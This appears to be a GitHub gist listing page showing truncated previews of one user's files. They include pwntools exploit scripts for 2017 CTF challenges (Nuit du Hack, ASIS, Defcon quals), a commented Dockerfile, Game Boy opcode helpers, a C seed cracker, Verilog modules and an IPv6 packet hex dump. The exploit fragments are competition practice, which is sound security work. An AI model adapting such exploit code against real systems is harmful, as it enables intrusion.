
Jonas Rudloff kokjo

@kokjo
kokjo / doit_letsenchiffre.py
Last active April 6, 2017 05:54
Exploit for letsenchiffre from Nuit du Hack quals 2017
import letsenchiffre_pb2 as letsenchiffre
from pwn import *
def forge_request(password):
crtreq = letsenchiffre.CertificateRequest()
crtreq.Locality = "A"
crtreq.State = "A"
crtreq.City = "A"
crtreq.Company = "A"
crtreq.CommonName = "A"
# Build/run environment for the challenge tooling (only the first steps of the
# file are visible in this excerpt).
# NOTE(review): `fedora` carries no tag or digest, so it resolves to whatever
# `latest` points at on the day of the build; pin a release tag or digest if
# the image has to be rebuilt reproducibly.
FROM fedora
# 32-bit (i686) glibc, OpenSSL and protobuf packages -- presumably because the
# target binary is 32-bit; confirm against the challenge files.
RUN dnf -y install glibc.i686 openssl-libs.i686 protobuf-devel.i686 protobuf-lite.i686 protobuf.i686
# Tooling to fetch and build third-party source (git, SCons) and a C compiler.
RUN dnf -y install git scons
RUN dnf -y install gcc
# 32-bit development libraries so gcc can target i686.
RUN dnf -y install glibc-devel.i686 libgcc.i686 libstdc++-devel.i686
# strace: syscall tracer, a debugging aid inside the container.
RUN dnf -y install strace
# C++ compiler plus the 64-bit development libraries.
RUN dnf -y install gcc-c++
RUN dnf -y install glibc-devel.x86_64 libgcc.x86_64 libstdc++-devel.x86_64
# NOTE(review): cloned from the repository's default branch; no commit or tag
# checkout is visible in this excerpt, so the code that gets built can change
# between image builds. Check out a known commit if that matters.
RUN git clone https://github.com/tsyrogit/zxcvbn-c.git
@kokjo
kokjo / doit.py
Last active June 3, 2019 15:52
Solution to the CRC problem from ASIS CTF 2017
from pwn import *
# Start a pwntools progress message that stays open while the table is built.
s = log.waitfor("Calculating CRC reverse lookup table")
# Map the CRC-32 of every 2-byte value (p16(i) for i in 0..65535) back to the
# two bytes that produced it, so a CRC can later be looked up in O(1).
# `crc` is expected to be in scope through the star import from pwn.
reverse_crc = {crc.crc_32(p16(i)): p16(i) for i in range(2**16)}
# Mark the progress message as finished.
s.success()
# Parse the challenge binary (path is relative to the current directory) and
# start it as a local child process; `e` and `r` are used by code outside this
# excerpt.
e = ELF("./crcme_8416479dcf3a74133080df4f454cd0f76ec9cc8d")
r = process("./crcme_8416479dcf3a74133080df4f454cd0f76ec9cc8d")
@MemLeak
@kokjo
kokjo / doit.py
Created April 10, 2017 12:21
Exploit for the challenge random from ASIS Quals CTF 2017
from pwn import *
# Tell pwntools that the target is 64-bit x86.
context.arch = "amd64"
# Run the challenge binary locally (path is relative to the current directory).
r = process("./Random_Generator_8c110de2ce4abb0f909bca289fb7b1a99fd18ef1")
# The remote endpoint is left disabled, so this script talks to the local copy.
#r = remote("69.90.132.40", 4000)
# Seeded with a single 0; what the entries mean is decided by code outside
# this excerpt -- presumably values read back from the service, confirm there.
values = [0]
for i in range(1,8):
r.sendline(str(i))
from pwn import *
def pwnit():
#h, w = (1024, 1024)
w, h = (1024, 1024)
#r.sendline(" "+"0"*4096 + "1 , 0 , A")
#r.recvuntil("> ")
@kokjo
kokjo / doit_gameboy.py
Created April 23, 2017 21:19
Please don't judge!
from pwn import *
def ld_c(num):
    """Assemble Game Boy ``LD C, d8``.

    Returns the two-byte encoding as a list: opcode 0x0E followed by
    *num* truncated to its low 8 bits.
    """
    immediate = num & 0xff
    return [0x0e, immediate]
def ld_a(num):
    """Assemble Game Boy ``LD A, d8``.

    Returns the two-byte encoding as a list: opcode 0x3E followed by
    *num* truncated to its low 8 bits.
    """
    encoded = [0x3e]
    encoded.append(num & 0xff)
    return encoded
def ld_l(num):
    """Assemble Game Boy ``LD L, d8``.

    Returns the two-byte encoding as a list: opcode 0x2E followed by
    *num* truncated to its low 8 bits.
    """
    low_byte = num & 0xff
    return [0x2e, low_byte]
def ld_h(num):
    """Assemble Game Boy ``LD H, d8``.

    Returns the two-byte encoding as a list: opcode 0x26 followed by
    *num* truncated to its low 8 bits.
    """
    encoded = [0x26]
    encoded.append(num & 0xff)
    return encoded
def ld_ff_c_a():
    """Assemble Game Boy ``LD (0xFF00+C), A``.

    Returns the single-byte encoding (opcode 0xE2) as a new list.
    """
    opcode = 0xe2
    return [opcode]
def set_iomem(reg, val):
    """Assemble a write of *val* to the I/O register at 0xFF00 + (reg & 0xff).

    The sequence is ``LD C, reg`` / ``LD A, val`` / ``LD (0xFF00+C), A``,
    returned as one list of five bytes.
    """
    # Build the pieces in the same order they are emitted.
    select_register = ld_c(reg & 0xff)
    load_value = ld_a(val)
    sequence = select_register + load_value
    return sequence + ld_ff_c_a()
def ld_a_hl_inc():
    """Assemble Game Boy ``LD A, (HL+)``.

    Returns the single-byte encoding (opcode 0x2A) as a new list.
    """
    opcode = 0x2a
    return [opcode]
def adc_a_hl():
    """Assemble Game Boy ``ADC A, (HL)``.

    Returns the single-byte encoding (opcode 0x8E) as a new list.
    """
    opcode = 0x8e
    return [opcode]
@kokjo
kokjo / crack_seed.c
Created May 1, 2017 12:11
Solution for reeses revenge from Defcon quals 2017
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <pthread.h>
/*
 * Context record: a 32-word state array plus one extra word.
 * The code that fills and advances it is outside this excerpt.
 */
typedef struct {
unsigned int s[32]; /* 32 unsigned words of state */
unsigned int i; /* NOTE(review): looks like a position/index into s[] -- confirm against its users */
} ctx_t;
@kokjo
kokjo / ram.v
Created November 12, 2018 21:23
module ram (
clk,
mem_valid, mem_ready,
mem_addr, mem_rdata,
mem_wdata, mem_wstrb
);
input clk;
input mem_valid;
output reg mem_ready;
input [31:0] mem_addr;
`default_nettype none
module crc32_top (
input clk, input rst,
input [7:0] data,
output [31:0] state,
);
reg [31:0] state_reg;
wire [31:0] state_next;
crc32 crc32 (
00000000: 33 33 00 00 00 16 50 7b 9d 66 8d 42 86 dd 60 00 33....P{.f.B..`.
00000010: 00 00 00 24 00 01 fe 80 00 00 00 00 00 00 52 7b ...$..........R{
00000020: 9d ff fe 66 8d 42 ff 02 00 00 00 00 00 00 00 00 ...f.B..........
00000030: 00 00 00 00 00 16 3a 00 05 02 00 00 01 00 8f 00 ......:.........
00000040: 67 3c 00 00 00 01 04 00 00 00 ff 02 00 00 00 00 g<..............
00000050: 00 00 00 00 00 01 ff 66 8d 42 2c c8 39 4a e5 fd .......f.B,.9J..
00000060: ab 83 33 33 00 00 00 16 50 7b 9d 66 8d 42 86 dd ..33....P{.f.B..
00000070: 60 00 00 00 00 24 00 01 fe 80 00 00 00 00 00 00 `....$..........
00000080: 52 7b 9d ff fe 66 8d 42 ff 02 00 00 00 00 00 00 R{...f.B........
00000090: 00 00 00 00 00 00 00 16 3a 00 05 02 00 00 01 00 ........:.......